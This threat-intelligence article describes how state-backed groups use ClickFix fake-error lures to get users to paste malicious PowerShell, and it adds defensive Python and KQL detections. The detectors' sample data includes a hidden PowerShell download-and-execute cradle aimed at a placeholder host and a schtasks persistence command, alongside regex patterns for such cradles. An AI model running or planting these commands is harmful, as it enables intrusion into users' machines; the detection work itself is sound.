State-backed hackers from North Korea, Iran, and Russia exploit ClickFix social ...
ClickFix, a deceptive social engineering tactic originally used by cybercriminals, has now been adopted by multiple state-sponsored threat actors from North Korea, Iran, and Russia for espionage operations. This comprehensive analysis examines how this technique works, why it’s effective, and how various threat actors implement it in their campaigns.
## Evolution and Mechanics of ClickFix
ClickFix is a sophisticated social engineering technique that leverages dialogue boxes containing fake error messages to trick users into copying, pasting, and running malicious PowerShell commands on their own devices. Initially observed in early 2024 in campaigns from initial access broker TA571 and the ClearFake threat cluster, ClickFix has since grown dramatically in popularity across the threat landscape.
The technique operates through a cleverly designed psychological trap. When users visit a malicious website (often via phishing emails or malvertising), they're presented with a fabricated error message that claims a document cannot be opened or a download has failed. The dialogue box then provides what appears to be a helpful solution, typically instructions to copy and paste a command into PowerShell or the Windows Run dialog, that will supposedly fix the issue[1]. Once executed, these commands download and run malware that gives attackers access to the victim's system.
What makes ClickFix particularly insidious is how it preys on people’s natural desire to be helpful and independent. By providing both a problem and an apparent solution, attackers make victims feel empowered to "fix" the issue themselves without involving IT support. This approach bypasses security protections by essentially tricking users into infecting their own systems[1].
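Because the Windows Run dialog keeps a history of what was typed into it, a responder triaging a suspected ClickFix victim can check that history for pasted download-and-execute one-liners. The Python below is an added example, not code from the original article: it parses a constructed `.reg` export of the user's RunMRU key (the commands and the URL are placeholders) and flags entries that look like download cradles.

```python
import re

# Constructed sample .reg export of the Run dialog history (RunMRU).
# Not a real capture; the URL is a placeholder. Explorer stores each entry
# as a lettered value ending in "\1" and orders them in MRUList, newest first.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU]
"a"="notepad\\1"
"b"="powershell -w hidden -c \"iwr http://placeholder.invalid/fix.txt | iex\"\\1"
"c"="mstsc\\1"
"MRUList"="bca"
'''

VALUE_LINE = re.compile(r'^"(\w+)"="(.*)"$')
# Copy-paste lures typically pair a download step with in-memory execution.
CRADLE = re.compile(r"(?i)(iwr|invoke-webrequest|downloadstring|"
                    r"invoke-expression|\biex\b|-enc\w*\s|https?://)")


def parse_runmru(text):
    """Return Run dialog entries from a .reg export, most recent first."""
    values = {}
    for line in text.splitlines():
        m = VALUE_LINE.match(line.strip())
        if not m:
            continue
        name, data = m.group(1), m.group(2)
        # .reg escaping: \" is a literal quote, \\ is a literal backslash
        data = data.replace('\\"', '"').replace("\\\\", "\\")
        values[name] = data
    order = values.pop("MRUList", "")
    entries = []
    for key in order:
        cmd = values.get(key, "")
        if cmd.endswith("\\1"):  # strip the "\1" suffix Explorer appends
            cmd = cmd[:-2]
        entries.append(cmd)
    return entries


def suspicious_run_entries(text):
    """Entries whose command line matches a download-cradle pattern."""
    return [c for c in parse_runmru(text) if CRADLE.search(c)]
```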
### Variants and Evolution
ClickFix has evolved since its early implementations, with several variants now in circulation:
1. **Standard Error Fix Variant**: Claims a document or file cannot be opened due to an error that needs fixing.
2. **CAPTCHA Verification Variant**: Presents a fake "Verify You Are Human" CAPTCHA check, based on an open-source toolkit named reCAPTCHA Phish that appeared on GitHub in mid-September 2024[1].
3. **Device Registration Variant**: Requires users to "register" their device by running commands to supposedly access secure content.
4. **Update Requirement Variant**: Claims a critical security update must be applied immediately.
The effectiveness of these variants has led to their rapid adoption across both cybercriminal and state-sponsored threat actors, with Proofpoint observing ClickFix campaigns leading to the deployment of various malware payloads including AsyncRAT, Danabot, DarkGate, Lumma Stealer, and NetSupport[1].
## State-Sponsored Threat Actors Embracing ClickFix
Between late 2024 and early 2025, multiple advanced persistent threat (APT) groups from North Korea, Iran, and Russia adopted ClickFix in their espionage operations[8][13][14]. This marks a significant evolution in the technique's usage, transitioning from primarily cybercriminal applications to state-sponsored espionage.
### Kimsuky (North Korea)
Between January and February 2025, the North Korean threat actor Kimsuky (also known as TA427) targeted think tanks focused on North Korea-related policy using ClickFix[8][13].
The attack began with spoofed emails in Korean, Japanese, or English purporting to be from Japanese diplomats to initiate contact and build trust with targets. After establishing rapport, the attackers sent PDF files linking to fake secure drives that prompted users to "register" their devices by copying and pasting PowerShell commands into their terminals[8][13].
Once executed, this PowerShell command fetched a second remotely hosted PowerShell script that displayed a decoy PDF document while secretly creating Visual Basic Scripts set to run every 19 minutes via scheduled tasks. These scripts ultimately downloaded and executed QuasarRAT, an open-source remote access trojan that Kimsuky has been using for at least four years[8]. The decoy document claimed to be from the Japanese Ministry of Foreign Affairs and contained questions about nuclear proliferation and policy in Northeast Asia, maintaining the illusion of legitimacy while the malware established persistence[8].
### MuddyWater (Iran)
In mid-November 2024, the Iranian threat group MuddyWater (TA450) targeted at least 39 organizations primarily in the Middle East using ClickFix[8][13][14]. Their campaign used an attacker-controlled email address (support@microsoftonlines[.]com) to send English-language phishing emails disguised as Microsoft security alerts with the subject line "Urgent Security Update Required – Immediate Action Needed"[8].
The attackers deployed ClickFix by instructing recipients to run PowerShell with administrator privileges and then copy-paste a command from the email body. This command installed Level, a remote management and monitoring (RMM) tool that the attackers could then abuse to conduct espionage and exfiltrate data[8].
While MuddyWater has historically used various RMM tools such as Atera, PDQ Connect, ScreenConnect, and SimpleHelp, this was the first observation of them using Level in Proofpoint data[8]. The campaign targeted various sectors including finance, government, health, education, and transportation across the Middle East (particularly UAE and Saudi Arabia) as well as in Canada, Germany, Switzerland, and the United States[8][13].
### UNK_RemoteRogue (Russia)
In December 2024, a suspected Russian threat actor tracked as UNK_RemoteRogue targeted two organizations associated with a major arms manufacturer[8][13][14]. The attackers sent malicious emails from compromised Zimbra servers that spoofed Microsoft Office and included links to fake documents[8].
When recipients clicked these links, they were directed to a page containing instructions in Russian along with a YouTube video tutorial demonstrating how to run PowerShell commands. Following these instructions executed JavaScript that launched PowerShell code linked to the Empire command and control (C2) framework[8][13].
This attack specifically targeted organizations in the defense industry with connections to the ongoing conflict in Ukraine[13]. UNK_RemoteRogue also shares infrastructure with phishing campaigns that targeted defense and aerospace entities to harvest webmail credentials via fake login pages[13].
### APT28 (Russia/GRU)
As early as October 2024, the Russian military intelligence group APT28 (TA422) also adopted ClickFix in their operations. Their approach involved phishing emails mimicking Google Sheets with a fake reCAPTCHA verification step[3][8].
After completing the fake verification, a pop-up guided users to run PowerShell commands that established an SSH tunnel and deployed Metasploit, providing the attackers with remote access to the victim’s systems[3][8]. This sophisticated approach enabled APT28 to maintain persistent access for intelligence gathering operations.
## Technical Analysis and Detection Opportunities
The implementation of ClickFix by various threat actors follows a similar pattern but with group-specific customizations. In most cases, the attack chain involves:
1. **Initial Access**: Typically via phishing emails or compromised websites
2. **User Deception**: Presentation of a fake error or verification requirement
3. **Command Execution**: Tricking users into running PowerShell commands
4. **Payload Delivery**: Downloading and executing the actual malware
During the payload delivery phase, PowerShell typically downloads the malware disguised as an image or benign file and then executes it on the victim's machine[2]. This activity can be detected through monitoring for suspicious PowerShell behavior, particularly instances where PowerShell drops executable files[2].
A sample KQL query for detecting this behavior would look for PowerShell processes dropping executable files:
```kusto
// File creation events where a PowerShell host is the initiating process
DeviceFileEvents
| where InitiatingProcessFileName in~ ("powershell.exe", "pwsh.exe")  // case-insensitive; also covers PowerShell 7
| where FileName matches regex "(?i)\\.(exe|dll|msi)$"                // executable extensions
| project Timestamp, DeviceName, InitiatingProcessCommandLine, FileName, FolderPath, SHA256
```
This query filters for file creation events where PowerShell is the parent process and the file has an executable extension (.exe, .dll, or .msi)[2].
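Beyond the single file-drop query, the stages described above (a PowerShell command pasted from an interactive parent such as the Run dialog, PowerShell writing an executable, and a short-interval scheduled task launching a script host as in the Kimsuky chain) can be checked together over endpoint telemetry. The Python below is an added example, not from the article or any vendor product: the event records, device names and URL are constructed, and the field names are assumptions rather than any particular EDR schema.

```python
import re

# Constructed sample telemetry (not real data): one event per ClickFix stage
# on WS01, plus a benign scripted PowerShell launch on WS02.
SAMPLE_EVENTS = [
    {"type": "process", "device": "WS01", "parent": "explorer.exe",
     "image": "powershell.exe",
     "cmdline": 'powershell -w hidden -c "iwr http://placeholder.invalid/a.txt | iex"'},
    {"type": "file", "device": "WS01", "initiating": "powershell.exe",
     "file": "update.exe", "folder": "C:\\Users\\u\\AppData\\Local\\Temp"},
    {"type": "process", "device": "WS01", "parent": "powershell.exe",
     "image": "schtasks.exe",
     "cmdline": 'schtasks /create /tn Updater /sc minute /mo 19 '
                '/tr "wscript.exe C:\\Users\\u\\AppData\\Roaming\\u.vbs"'},
    {"type": "process", "device": "WS02", "parent": "cmd.exe",
     "image": "powershell.exe",
     "cmdline": "powershell -File C:\\scripts\\backup.ps1"},
]

POWERSHELL = {"powershell.exe", "pwsh.exe"}
# Parents a user would be sitting in when pasting a ClickFix command.
INTERACTIVE_PARENTS = {"explorer.exe", "chrome.exe", "msedge.exe", "firefox.exe"}
CRADLE = re.compile(r"(?i)(iwr|invoke-webrequest|downloadstring|downloadfile|"
                    r"invoke-expression|\biex\b|-enc\w*\s|https?://)")
EXEC_EXT = re.compile(r"(?i)\.(exe|dll|msi)$")
TASK_INTERVAL = re.compile(r"(?i)/sc\s+minute\s+/mo\s+(\d+)")
SCRIPT_HOST = re.compile(r"(?i)(wscript|cscript|\.vbs)")


def evaluate(events, max_interval_minutes=30):
    """Return (rule, device, detail) tuples for events matching a stage."""
    hits = []
    for e in events:
        if e["type"] == "process" and e["image"].lower() in POWERSHELL:
            if e["parent"].lower() in INTERACTIVE_PARENTS and CRADLE.search(e["cmdline"]):
                hits.append(("user_pasted_download_cradle", e["device"], e["cmdline"]))
        elif e["type"] == "file" and e["initiating"].lower() in POWERSHELL:
            if EXEC_EXT.search(e["file"]):
                hits.append(("powershell_dropped_executable", e["device"], e["file"]))
        elif e["type"] == "process" and e["image"].lower() == "schtasks.exe":
            m = TASK_INTERVAL.search(e["cmdline"])
            if m and int(m.group(1)) <= max_interval_minutes and SCRIPT_HOST.search(e["cmdline"]):
                hits.append(("short_interval_script_task", e["device"], e["cmdline"]))
    return hits
```

Correlating several stage hits on one device within a short window gives far higher confidence than any single rule, since scripted PowerShell and scheduled tasks are common in normal administration.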
## Why ClickFix Remains Effective
ClickFix has become widely adopted because it effectively circumvents many traditional security controls. Rather than relying on malicious attachments or links that security tools might catch, it exploits human psychology and behavior through social engineering.
The rise of ClickFix can be attributed to improving security awareness around traditional attack vectors. As users have become more cautious about macros, suspicious attachments, and obviously malicious links, attackers have had to adapt by developing more sophisticated social engineering techniques[1].
By focusing on "hacking people's brains, emotions, and behaviors," ClickFix attackers can bypass technical security controls through authorized user actions. Additionally, the technique is effective because:
1. It provides both a problem and a solution, empowering the user
2. It leverages trusted interfaces (like OS dialogue boxes and PowerShell)
3. It appears to come from authoritative sources (Microsoft, Google, etc.)
4. It creates urgency that bypasses critical thinking
## Defensive Recommendations
To protect against ClickFix and similar social engineering techniques, organizations and individuals should implement several protective measures:
1. **User Education**: Specifically train users about the ClickFix technique and emphasize that legitimate software would never require copying and pasting commands from dialogue boxes.
2. **Technical Controls**: Implement PowerShell restrictions such as Constrained Language Mode and script block logging to detect suspicious PowerShell activity.
3. **Email Security**: Deploy robust email filtering solutions to identify and block phishing attempts before they reach users.
4. **Principle of Least Privilege**: Limit administrative privileges to reduce the impact of successful attacks.
5. **Behavior Monitoring**: Implement endpoint detection and response (EDR) solutions that can identify suspicious PowerShell execution patterns.
The adoption of ClickFix by state-sponsored threat actors from North Korea, Iran, and Russia represents a significant evolution in social engineering tactics used for espionage purposes. Rather than developing entirely new techniques, these groups are incorporating effective methods from the cybercriminal ecosystem into their existing toolkits[8][13].
This trend illustrates the increasing convergence between cybercriminal and state-sponsored tactics and the continued emphasis on social engineering as a primary attack vector. As security awareness continues to improve around traditional attack methods, we can expect further innovations in social engineering techniques that exploit human psychology rather than technical vulnerabilities.
The widespread adoption of ClickFix across multiple state-sponsored groups in a relatively short timeframe demonstrates its effectiveness and suggests it will likely become even more prevalent among threat actors in the near future[8][13]. Organizations must remain vigilant and adapt their security awareness training to address these evolving threats.